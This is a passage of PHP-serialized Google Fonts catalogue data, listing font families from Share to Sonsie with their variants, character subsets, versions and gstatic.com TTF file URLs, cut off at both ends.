thIREMM4uSDgzgU0ezpKfwzA.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1243;O:8:\"stdClass\":8:{s:6:\"family\";s:5:\"Share\";s:8:\"variants\";a:4:{i:0;s:7:\"regular\";i:1;s:6:\"italic\";i:2;s:3:\"700\";i:3;s:9:\"700italic\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v16\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":4:{s:7:\"regular\";s:65:\"http://fonts.gstatic.com/s/share/v16/i7dEIFliZjKNF5VNHLq2cV5d.ttf\";s:6:\"italic\";s:68:\"http://fonts.gstatic.com/s/share/v16/i7dKIFliZjKNF6VPFr6UdE5dWFM.ttf\";s:3:\"700\";s:69:\"http://fonts.gstatic.com/s/share/v16/i7dJIFliZjKNF63xM56-WkJUQUq7.ttf\";s:9:\"700italic\";s:72:\"http://fonts.gstatic.com/s/share/v16/i7dPIFliZjKNF6VPLgK7UEZ2RFq7AwU.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1244;O:8:\"stdClass\":8:{s:6:\"family\";s:10:\"Share Tech\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v17\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:76:\"http://fonts.gstatic.com/s/sharetech/v17/7cHtv4Uyi5K0OeZ7bohUwHoDmTcibrA.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1245;O:8:\"stdClass\":8:{s:6:\"family\";s:15:\"Share Tech Mono\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v15\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:87:\"http://fonts.gstatic.com/s/sharetechmono/v15/J7aHnp1uDWRBEqV98dVQztYldFc7pAsEIc3Xew.ttf\";}s:8:\"category\";s:9:\"monospace\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1246;O:8:\"stdClass\":8:{s:6:\"family\";s:16:\"Shippori Antique\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:3:{i:0;s:8:\"japanese\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";}s:7:\"version\";s:2:\"v8\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:89:\"http://fonts.gstatic.com/s/shipporiantique/v8/-F6qfid3KC8pdMyzR0qRyFUht11v8ldPg-IUDNg.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1247;O:8:\"stdClass\":8:{s:6:\"family\";s:19:\"Shippori Antique B1\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:3:{i:0;s:8:\"japanese\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";}s:7:\"version\";s:2:\"v8\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:95:\"http://fonts.gstatic.com/s/shipporiantiqueb1/v8/2Eb7L_JwClR7Zl_UAKZ0mUHw3oMKd40grRFCj9-5Y8Y.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1248;O:8:\"stdClass\":8:{s:6:\"family\";s:15:\"Shippori Mincho\";s:8:\"variants\";a:5:{i:0;s:7:\"regular\";i:1;s:3:\"500\";i:2;s:3:\"600\";i:3;s:3:\"700\";i:4;s:3:\"800\";}s:7:\"subsets\";a:3:{i:0;s:8:\"japanese\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v14\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":5:{s:7:\"regular\";s:88:\"http://fonts.gstatic.com/s/shipporimincho/v14/VdGGAZweH5EbgHY6YExcZfDoj0BA2_-C7LoS7g.ttf\";s:3:\"500\";s:92:\"http://fonts.gstatic.com/s/shipporimincho/v14/VdGDAZweH5EbgHY6YExcZfDoj0B4L9am5JEO5--2zg.ttf\";s:3:\"600\";s:92:\"http://fonts.gstatic.com/s/shipporimincho/v14/VdGDAZweH5EbgHY6YExcZfDoj0B4A9Gm5JEO5--2zg.ttf\";s:3:\"700\";s:92:\"http://fonts.gstatic.com/s/shipporimincho/v14/VdGDAZweH5EbgHY6YExcZfDoj0B4Z9Cm5JEO5--2zg.ttf\";s:3:\"800\";s:92:\"http://fonts.gstatic.com/s/shipporimincho/v14/VdGDAZweH5EbgHY6YExcZfDoj0B4e9Om5JEO5--2zg.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1249;O:8:\"stdClass\":8:{s:6:\"family\";s:18:\"Shippori Mincho B1\";s:8:\"variants\";a:5:{i:0;s:7:\"regular\";i:1;s:3:\"500\";i:2;s:3:\"600\";i:3;s:3:\"700\";i:4;s:3:\"800\";}s:7:\"subsets\";a:3:{i:0;s:8:\"japanese\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v19\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":5:{s:7:\"regular\";s:93:\"http://fonts.gstatic.com/s/shipporiminchob1/v19/~ChQKElNoaXBwb3JpIE1pbmNobyBCMSAAKgQIARgB.ttf\";s:3:\"500\";s:97:\"http://fonts.gstatic.com/s/shipporiminchob1/v19/~ChcKElNoaXBwb3JpIE1pbmNobyBCMRj0AyAAKgQIARgB.ttf\";s:3:\"600\";s:97:\"http://fonts.gstatic.com/s/shipporiminchob1/v19/~ChcKElNoaXBwb3JpIE1pbmNobyBCMRjYBCAAKgQIARgB.ttf\";s:3:\"700\";s:97:\"http://fonts.gstatic.com/s/shipporiminchob1/v19/~ChcKElNoaXBwb3JpIE1pbmNobyBCMRi8BSAAKgQIARgB.ttf\";s:3:\"800\";s:97:\"http://fonts.gstatic.com/s/shipporiminchob1/v19/~ChcKElNoaXBwb3JpIE1pbmNobyBCMRigBiAAKgQIARgB.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1250;O:8:\"stdClass\":8:{s:6:\"family\";s:9:\"Shojumaru\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v15\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:75:\"http://fonts.gstatic.com/s/shojumaru/v15/rax_HiWfutkLLnaKCtlMBBJek0vA8A.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1251;O:8:\"stdClass\":8:{s:6:\"family\";s:11:\"Short Stack\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v15\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:78:\"http://fonts.gstatic.com/s/shortstack/v15/bMrzmS2X6p0jZC6EcmPFX-SScX8D0nq6.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1252;O:8:\"stdClass\":8:{s:6:\"family\";s:9:\"Shrikhand\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:3:{i:0;s:8:\"gujarati\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v11\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:75:\"http://fonts.gstatic.com/s/shrikhand/v11/a8IbNovtLWfR7T7bMJwbBIiQ0zhMtA.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1253;O:8:\"stdClass\":8:{s:6:\"family\";s:8:\"Siemreap\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"khmer\";}s:7:\"version\";s:3:\"v24\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:72:\"http://fonts.gstatic.com/s/siemreap/v24/Gg82N5oFbgLvHAfNl2YbnA8DLXpe.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1254;O:8:\"stdClass\":8:{s:6:\"family\";s:10:\"Sigmar One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v16\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:76:\"http://fonts.gstatic.com/s/sigmarone/v16/co3DmWZ8kjZuErj9Ta3dk6Pjp3Di8U0.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1255;O:8:\"stdClass\":8:{s:6:\"family\";s:7:\"Signika\";s:8:\"variants\";a:5:{i:0;s:3:\"300\";i:1;s:7:\"regular\";i:2;s:3:\"500\";i:3;s:3:\"600\";i:4;s:3:\"700\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v20\";s:12:\"lastModified\";s:10:\"2022-08-24\";s:5:\"files\";O:8:\"stdClass\":5:{s:3:\"300\";s:87:\"http://fonts.gstatic.com/s/signika/v20/vEFO2_JTCgwQ5ejvMV0O96D01E8J0tIJHJbGhs_cfKe1.ttf\";s:7:\"regular\";s:87:\"http://fonts.gstatic.com/s/signika/v20/vEFO2_JTCgwQ5ejvMV0O96D01E8J0tJXHJbGhs_cfKe1.ttf\";s:3:\"500\";s:87:\"http://fonts.gstatic.com/s/signika/v20/vEFO2_JTCgwQ5ejvMV0O96D01E8J0tJlHJbGhs_cfKe1.ttf\";s:3:\"600\";s:87:\"http://fonts.gstatic.com/s/signika/v20/vEFO2_JTCgwQ5ejvMV0O96D01E8J0tKJG5bGhs_cfKe1.ttf\";s:3:\"700\";s:87:\"http://fonts.gstatic.com/s/signika/v20/vEFO2_JTCgwQ5ejvMV0O96D01E8J0tKwG5bGhs_cfKe1.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1256;O:8:\"stdClass\":8:{s:6:\"family\";s:16:\"Signika Negative\";s:8:\"variants\";a:5:{i:0;s:3:\"300\";i:1;s:7:\"regular\";i:2;s:3:\"500\";i:3;s:3:\"600\";i:4;s:3:\"700\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v20\";s:12:\"lastModified\";s:10:\"2022-08-24\";s:5:\"files\";O:8:\"stdClass\":5:{s:3:\"300\";s:107:\"http://fonts.gstatic.com/s/signikanegative/v20/E21x_cfngu7HiRpPX3ZpNE4kY5zKSPmJXkF0VDD2RAr5S73st9hiuEq8.ttf\";s:7:\"regular\";s:107:\"http://fonts.gstatic.com/s/signikanegative/v20/E21x_cfngu7HiRpPX3ZpNE4kY5zKSPmJXkF0VDD2RAqnS73st9hiuEq8.ttf\";s:3:\"500\";s:107:\"http://fonts.gstatic.com/s/signikanegative/v20/E21x_cfngu7HiRpPX3ZpNE4kY5zKSPmJXkF0VDD2RAqVS73st9hiuEq8.ttf\";s:3:\"600\";s:107:\"http://fonts.gstatic.com/s/signikanegative/v20/E21x_cfngu7HiRpPX3ZpNE4kY5zKSPmJXkF0VDD2RAp5TL3st9hiuEq8.ttf\";s:3:\"700\";s:107:\"http://fonts.gstatic.com/s/signikanegative/v20/E21x_cfngu7HiRpPX3ZpNE4kY5zKSPmJXkF0VDD2RApATL3st9hiuEq8.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1257;O:8:\"stdClass\":8:{s:6:\"family\";s:10:\"Silkscreen\";s:8:\"variants\";a:2:{i:0;s:7:\"regular\";i:1;s:3:\"700\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:2:\"v1\";s:12:\"lastModified\";s:10:\"2022-08-09\";s:5:\"files\";O:8:\"stdClass\":2:{s:7:\"regular\";s:76:\"http://fonts.gstatic.com/s/silkscreen/v1/m8JXjfVPf62XiF7kO-i9ULRvamODxdI.ttf\";s:3:\"700\";s:80:\"http://fonts.gstatic.com/s/silkscreen/v1/m8JUjfVPf62XiF7kO-i9aAhATmuo2dudFvc.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1258;O:8:\"stdClass\":8:{s:6:\"family\";s:9:\"Simonetta\";s:8:\"variants\";a:4:{i:0;s:7:\"regular\";i:1;s:6:\"italic\";i:2;s:3:\"900\";i:3;s:9:\"900italic\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v23\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":4:{s:7:\"regular\";s:75:\"http://fonts.gstatic.com/s/simonetta/v23/x3dickHVYrCU5BU15c4BfPACvy_1BA.ttf\";s:6:\"italic\";s:77:\"http://fonts.gstatic.com/s/simonetta/v23/x3dkckHVYrCU5BU15c4xfvoGnSrlBBsy.ttf\";s:3:\"900\";s:79:\"http://fonts.gstatic.com/s/simonetta/v23/x3dnckHVYrCU5BU15c45-N0mtwTpDQIrGg.ttf\";s:9:\"900italic\";s:81:\"http://fonts.gstatic.com/s/simonetta/v23/x3d5ckHVYrCU5BU15c4xfsKCsA7tLwc7Gn88.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1259;O:8:\"stdClass\":8:{s:6:\"family\";s:10:\"Single Day\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:6:\"korean\";}s:7:\"version\";s:3:\"v15\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:76:\"http://fonts.gstatic.com/s/singleday/v15/LYjHdGDjlEgoAcF95EI5jVoFUNfeQJU.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1260;O:8:\"stdClass\":8:{s:6:\"family\";s:7:\"Sintony\";s:8:\"variants\";a:2:{i:0;s:7:\"regular\";i:1;s:3:\"700\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v13\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":2:{s:7:\"regular\";s:70:\"http://fonts.gstatic.com/s/sintony/v13/XoHm2YDqR7-98cVUITQnu98ojjs.ttf\";s:3:\"700\";s:74:\"http://fonts.gstatic.com/s/sintony/v13/XoHj2YDqR7-98cVUGYgIn9cDkjLp6C8.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1261;O:8:\"stdClass\":8:{s:6:\"family\";s:13:\"Sirin Stencil\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v21\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:83:\"http://fonts.gstatic.com/s/sirinstencil/v21/mem4YaWwznmLx-lzGfN7MdRydchGBq6al6o.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1262;O:8:\"stdClass\":8:{s:6:\"family\";s:8:\"Six Caps\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v16\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:71:\"http://fonts.gstatic.com/s/sixcaps/v16/6ae_4KGrU7VR7bNmabcS9XXaPCop.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1263;O:8:\"stdClass\":8:{s:6:\"family\";s:7:\"Skranji\";s:8:\"variants\";a:2:{i:0;s:7:\"regular\";i:1;s:3:\"700\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v13\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":2:{s:7:\"regular\";s:70:\"http://fonts.gstatic.com/s/skranji/v13/OZpDg_dtriVFNerMYzuuklTm3Ek.ttf\";s:3:\"700\";s:74:\"http://fonts.gstatic.com/s/skranji/v13/OZpGg_dtriVFNerMW4eBtlzNwED-b4g.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1264;O:8:\"stdClass\":8:{s:6:\"family\";s:10:\"Slabo 13px\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v13\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:76:\"http://fonts.gstatic.com/s/slabo13px/v13/11hEGp_azEvXZUdSBzzRcKer2wkYnvI.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1265;O:8:\"stdClass\":8:{s:6:\"family\";s:10:\"Slabo 27px\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v12\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:76:\"http://fonts.gstatic.com/s/slabo27px/v12/mFT0WbgBwKPR_Z4hGN2qsxgJ1EJ7i90.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1266;O:8:\"stdClass\":8:{s:6:\"family\";s:7:\"Slackey\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v24\";s:12:\"lastModified\";s:10:\"2022-04-20\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:70:\"http://fonts.gstatic.com/s/slackey/v24/N0bV2SdQO-5yM0-dKlRaJdbWgdY.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1267;O:8:\"stdClass\":8:{s:6:\"family\";s:6:\"Smokum\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v24\";s:12:\"lastModified\";s:10:\"2022-04-20\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:68:\"http://fonts.gstatic.com/s/smokum/v24/TK3iWkUbAhopmrdGHjUHte5fKg.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1268;O:8:\"stdClass\":8:{s:6:\"family\";s:6:\"Smooch\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:10:\"vietnamese\";}s:7:\"version\";s:2:\"v5\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:67:\"http://fonts.gstatic.com/s/smooch/v5/o-0LIps4xW8U1xUBjqp_6hVdYg.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1269;O:8:\"stdClass\":8:{s:6:\"family\";s:11:\"Smooch Sans\";s:8:\"variants\";a:9:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:7:\"regular\";i:4;s:3:\"500\";i:5;s:3:\"600\";i:6;s:3:\"700\";i:7;s:3:\"800\";i:8;s:3:\"900\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:10:\"vietnamese\";}s:7:\"version\";s:2:\"v6\";s:12:\"lastModified\";s:10:\"2022-08-24\";s:5:\"files\";O:8:\"stdClass\":9:{s:3:\"100\";s:95:\"http://fonts.gstatic.com/s/smoochsans/v6/c4mz1n5uGsXss2LJh1QH6b129FZvxPj6I4oiwUFodqIeNlzayg.ttf\";s:3:\"200\";s:95:\"http://fonts.gstatic.com/s/smoochsans/v6/c4mz1n5uGsXss2LJh1QH6b129FZvxPj6I4oiQUBodqIeNlzayg.ttf\";s:3:\"300\";s:95:\"http://fonts.gstatic.com/s/smoochsans/v6/c4mz1n5uGsXss2LJh1QH6b129FZvxPj6I4oin0BodqIeNlzayg.ttf\";s:7:\"regular\";s:95:\"http://fonts.gstatic.com/s/smoochsans/v6/c4mz1n5uGsXss2LJh1QH6b129FZvxPj6I4oiwUBodqIeNlzayg.ttf\";s:3:\"500\";s:95:\"http://fonts.gstatic.com/s/smoochsans/v6/c4mz1n5uGsXss2LJh1QH6b129FZvxPj6I4oi80BodqIeNlzayg.ttf\";s:3:\"600\";s:95:\"http://fonts.gstatic.com/s/smoochsans/v6/c4mz1n5uGsXss2LJh1QH6b129FZvxPj6I4oiH0dodqIeNlzayg.ttf\";s:3:\"700\";s:95:\"http://fonts.gstatic.com/s/smoochsans/v6/c4mz1n5uGsXss2LJh1QH6b129FZvxPj6I4oiJkdodqIeNlzayg.ttf\";s:3:\"800\";s:95:\"http://fonts.gstatic.com/s/smoochsans/v6/c4mz1n5uGsXss2LJh1QH6b129FZvxPj6I4oiQUdodqIeNlzayg.ttf\";s:3:\"900\";s:95:\"http://fonts.gstatic.com/s/smoochsans/v6/c4mz1n5uGsXss2LJh1QH6b129FZvxPj6I4oiaEdodqIeNlzayg.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1270;O:8:\"stdClass\":8:{s:6:\"family\";s:6:\"Smythe\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v23\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:68:\"http://fonts.gstatic.com/s/smythe/v23/MwQ3bhT01--coT1BOLh_uGInjA.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1271;O:8:\"stdClass\":8:{s:6:\"family\";s:7:\"Sniglet\";s:8:\"variants\";a:2:{i:0;s:7:\"regular\";i:1;s:3:\"800\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v17\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":2:{s:7:\"regular\";s:70:\"http://fonts.gstatic.com/s/sniglet/v17/cIf9MaFLtkE3UjaJxCmrYGkHgIs.ttf\";s:3:\"800\";s:74:\"http://fonts.gstatic.com/s/sniglet/v17/cIf4MaFLtkE3UjaJ_ImHRGEsnIJkWL4.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1272;O:8:\"stdClass\":8:{s:6:\"family\";s:7:\"Snippet\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v21\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:70:\"http://fonts.gstatic.com/s/snippet/v21/bWt47f7XfQH9Gupu2v_Afcp9QWc.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1273;O:8:\"stdClass\":8:{s:6:\"family\";s:13:\"Snowburst One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v20\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:83:\"http://fonts.gstatic.com/s/snowburstone/v20/MQpS-WezKdujBsXY3B7I-UT7eZ-UPyacPbo.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1274;O:8:\"stdClass\":8:{s:6:\"family\";s:10:\"Sofadi One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v21\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:76:\"http://fonts.gstatic.com/s/sofadione/v21/JIA2UVBxdnVBuElZaMFGcDOIETkmYDU.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1275;O:8:\"stdClass\":8:{s:6:\"family\";s:5:\"Sofia\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v14\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:65:\"http://fonts.gstatic.com/s/sofia/v14/8QIHdirahM3j_vu-sowsrqjk.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1276;O:8:\"stdClass\":8:{s:6:\"family\";s:6:\"Solway\";s:8:\"variants\";a:5:{i:0;s:3:\"300\";i:1;s:7:\"regular\";i:2;s:3:\"500\";i:3;s:3:\"700\";i:4;s:3:\"800\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v15\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":5:{s:3:\"300\";s:72:\"http://fonts.gstatic.com/s/solway/v15/AMOTz46Cs2uTAOCuLlgZms0QW3mqyg.ttf\";s:7:\"regular\";s:68:\"http://fonts.gstatic.com/s/solway/v15/AMOQz46Cs2uTAOCWgnA9kuYMUg.ttf\";s:3:\"500\";s:72:\"http://fonts.gstatic.com/s/solway/v15/AMOTz46Cs2uTAOCudlkZms0QW3mqyg.ttf\";s:3:\"700\";s:72:\"http://fonts.gstatic.com/s/solway/v15/AMOTz46Cs2uTAOCuPl8Zms0QW3mqyg.ttf\";s:3:\"800\";s:72:\"http://fonts.gstatic.com/s/solway/v15/AMOTz46Cs2uTAOCuIlwZms0QW3mqyg.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1277;O:8:\"stdClass\":8:{s:6:\"family\";s:10:\"Song Myung\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:6:\"korean\";i:1;s:5:\"latin\";}s:7:\"version\";s:3:\"v20\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:76:\"http://fonts.gstatic.com/s/songmyung/v20/1cX2aUDWAJH5-EIC7DIhr1GqhcitzeM.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1278;O:8:\"stdClass\":8:{s:6:\"family\";s:10:\"Sonsie 